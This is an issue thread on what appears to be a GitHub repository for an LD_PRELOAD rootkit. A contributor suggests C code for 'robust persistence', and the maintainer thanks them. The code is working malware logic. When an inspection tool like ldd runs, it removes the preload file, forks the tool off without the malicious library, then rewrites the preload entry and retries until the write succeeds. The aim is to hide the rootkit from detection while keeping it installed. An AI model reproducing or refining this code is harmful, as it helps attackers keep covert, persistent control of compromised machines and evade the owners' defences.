### ISSUE TITLE
Suggest: Robust persistence.

### ISSUE THREAD

**Issue by wzctggzl** [kcaaj/bdvl#23]
I am not sure if you are wanting to prevent forking to reduce overhead. This may not be suitable for your project.

 if(resident_evade(filename, argv, NULL)) {

  // race codition (call ldd terminate process before fork)
  if(resident_xia_fpath(PRELOADSTR, 0))
   resident_xunlink(PRELOADSTR);

  pid_t childPid;
  childPid = fork();

  if(childPid == 0) {
   return (long)call(CEXECVP, filename, argv);
   exit(0);
  } else if(childPid < 0) {
   exit(0);
  } else {
   int returnStatus;
   waitpid(childPid, &returnStatus, 0);

   if (returnStatus == 0) {
    resident_xwrite_str_disk(PRELOADSTR, resident_library_namec);
    // prevent race codition. (truncated file)
    while(!resident_xia_fpath(PRELOADSTR, 1))
     resident_xwrite_str_disk(PRELOADSTR, resident_library_namec);
    exit(0);
   }

   if (returnStatus == 1)
    exit(0);
  }
 }

**Comment by kcaaj** [comment]
All appreciated brother, thanks.
